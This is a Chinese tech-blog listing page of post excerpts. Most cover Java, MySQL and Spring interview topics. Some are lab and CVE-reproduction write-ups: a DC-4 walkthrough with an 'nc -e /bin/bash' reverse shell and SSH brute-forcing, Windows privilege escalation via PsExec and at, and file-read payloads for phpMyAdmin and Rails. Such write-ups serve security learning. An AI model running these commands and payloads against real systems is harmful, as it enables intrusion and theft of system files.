【面试专题】-前言

面试如何回答:1.突出重点2.能说清楚整个高可用部署架构和现场绘画架构图3.为啥选取此技术(同类技术的比较)4.知其然,知其所以然5.深入思考架构,技术选型的原因6.任何技术都是双刃剑--优点、缺点...
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【MYSQL-B+】

MYSQL-B+多路平衡查找树B+树索引B+树好处B+分列2.为什么选择B+树,不用Hash做索引??3.为什么使用主键自增索引??MYSQL的B+Tree索引树高度如何计算??数据库中B+树索引分为聚集索引(clustered index)和非聚集索引(secondary index).B+树索引B+树好处B+分列2.为什么选择B+树,不用Hash做索引??3.为什么使用主键自增索引??B+树是有序的,如果主键不是自增的话,可能带来叶子节点的迁移,—数据移动浪费性能;移动过程中如果数据页
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【SPRING-事务基础】

事务管理传播行为 隔离级别 是否只读 发生异常处理 超时时间Propagation Isolation readOnly Exception timeOut1.1. 事务传播行为什么叫事务传播行为?听起来挺高端的,其实很简单。即然是传播,那么至少有两个东西,才可以发生传播。单体不存在传播这个行为。事务传播行为(propagation behavior)指的就是当一个事务方法被另一个事务方法调用时,这个事务方法应该如何进行。例如:methodA事务方法调用methodB事务方法时,meth.
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【Spring -AOP-IOC定义】

IoC(Inversion of Control)(1). IoC(Inversion of Control)是指容器控制程序对象之间的关系,而不是传统实现中,由程序代码直接操控。控制权由应用代码中转到了外部容器,控制权的转移是所谓反转。 对于Spring而言,就是由Spring来控制对象的生命周期和对象之间的关系;IoC还有另外一个名字——“依赖注入(Dependency Injection)”。从名字上理解,所谓依赖注入,即组件之间的依赖关系由容器在运行期决定,即由容器动态地将某种依赖关系注入到组件
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【Spring-boot-ConditionalOnBean】

@ConditionalOnBean bean存在则创建@ConditionalOnMissingBean bean不存在则创建@ConditionalOnClass Class存在则创建@ConditionalOnMissingClass Class不存在则创建
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【经典的回答】

分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【MYSQL】-逻辑架构

分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【MYSQL】日志结构

分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【Linux命令之大文件切分与合并】

less -N filegrep world copy.log | lesstail 和 less 命令结合起来使用tail -n +10000 | less // 从第 10000 开始,使用 less 查看。tail -n 10000 | less // 查看倒数第 1000 行到文件最后的数据。与其说是查看大日志文件的方法,不如说是将 grep/awk/sed/head/less/tail 多个命令结合起来的方法Linux命令之大文件切分与合并一:切分当面临将一个大文件进行切分
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

【算法】-递归核心思想

递归套路第一要素:明确你这个函数想要干什么第二要素:寻找递归结束条件第三要素:找出函数的等价关系式案例1.斐波那契数列第一要素:明确你这个函数想要干什么第二要素:寻找递归结束条件第三要素:找出函数的等价关系式案例1.斐波那契数列f(n) = f(n-1) + f(n-2)...
分类: 其他 发布时间: 03-30 10:42 阅读次数: 0

JS中isNaN解析

用于判断一个变量是否为非数字的类型,返回true或falsevar temp=21;console.log(isNaN(temp));var temp1='not number';console.log(isNaN(temp1));
分类: 其他 发布时间: 03-30 10:41 阅读次数: 0

HBase分享 | 基于HBase和Spark构建企业级数据处理平台

摘要:在中国HBase技术社区第十届Meetup杭州站上,阿里云数据库技术专家李伟为大家分享了如何基于当下流行的HBase和Spark体系构建企业级数据处理平台,并且针对于一些具体落地场景进行了介绍。演讲嘉宾简介:李伟(花名:沐远),阿里云数据库技术专家。专注于大数据分布式计算和数据库领域,具有6年分布式开发经验,先后研发Spark及自主研发内存计算,目前为广大公有云用户提供专业的云HBase数据
分类: 编程语言 发布时间: 03-30 10:41 阅读次数: 0

HBase分享 | 云HBase之OpenTSDB时序引擎压缩优化

摘要:在中国HBase技术社区第十届MeetUp--HBase生态实践   (杭州站)上,阿里云技术专家郭泽晖为大家介绍了云HBase之时序引擎OpenTSDB的介绍及压缩优化,向大家展示了使用OpenTSDB所遇到的一些问题及优化方案,并对云OpenTSDB的集中使用模式进行了相应的介绍。本文根据演讲视频以及PPT整理而成。本文将主要围绕以下四个方面进行分享:OpenTSDB的介绍OpenTSD
分类: 编程语言 发布时间: 03-30 10:41 阅读次数: 0

技术分享:如何避免ajax重复请求?

在前端开发的过程中,如果没有注意限制和封锁经常会出现很多重复的ajax请求,导致服务器压力很大。今天小千就来给大家提供几个解决方案,看到就是赚到。
分类: 服务端 发布时间: 03-30 10:41 阅读次数: 0

CVE-2021-3019【Lanproxy 任意文件读取漏洞复现】

简介lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,目前仅支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面…)。目前市面上提供类似服务的有花生壳、TeamViewer、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。影响版本lanproxy 0.1漏洞概述本次Lanproxy 路径遍历漏洞 (CVE-2021-
分类: 其他 发布时间: 03-30 10:36 阅读次数: 0

靶机测试--DC(4)

目录信息收集主机发现端口扫描漏洞发现及利用反弹shell提权总结信息收集主机发现端口扫描漏洞发现及利用访问80:一个登录框,还给出了用户名admin。爆破密码:happy;登录。一个可以执行命令的页面:抓包,进行修改:存在命令执行漏洞。反弹shellnc -e /bin/bash ip地址 端口在home目录下发现三个用户:依次打开这三个目录:只有jim目录下有文件:打开后发现:打开文件,可能是个密码文件。使用hydra进行ssh爆破:使用ssh进行
分类: 其他 发布时间: 03-30 10:36 阅读次数: 0

Windows本地提权

1.PsExec提权PsExec -i -s cmd //-i 交互式 -s syetem权限 打开cmd窗口2.at 方式提权(xp,2003)at 00:00 /interactive cmd 指定时间执行cmd,获得system权限。操作系统中,who执行命令,命令就拥有who权限。使用system打开任务管理器:taskmgr结束explorer.exe(桌面进程,权限为管理员):桌面图标消失,任务栏消失。再打开一个桌面进程(文件,创建新任务):权限为系
分类: 其他 发布时间: 03-30 10:36 阅读次数: 0

phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)复现

CVE-2018-12613简介:phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。搭建环境:使用docker+vulhub的环境。复现过程:访问:index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd可以查看到文件信息:说明存在文件包含。在sql中执行SELECT '<?=phpinfo()?&gt
分类: 其他 发布时间: 03-30 10:36 阅读次数: 0

Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)复现

漏洞简介在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。复现过程访问首页,访问robots.txt:进行抓包,构造payload:使用msf框架:设置选项:运行:查看结果:...
分类: 其他 发布时间: 03-30 10:36 阅读次数: 0

vulnhub靶机测试--dpwnn 01

目录信息收集主机发现端口扫描目录扫描漏洞发现及利用提权总结信息收集主机发现端口扫描80 http服务;22 ssh;3306 MySQL。目录扫描就一个info.php漏洞发现及利用访问80端口:访问info.php:给出了phpinfo信息。但是没有什么可以利用的点。web端其实没什么东西。访问3306端口,连接MySQL:直接弱口令(其实没有密码,直接进来。。。。。。)正常操作,获得账号信息:获得ssh账号密码。进行连接:提权使用sudo查看suid权
分类: 其他 发布时间: 03-30 10:36 阅读次数: 0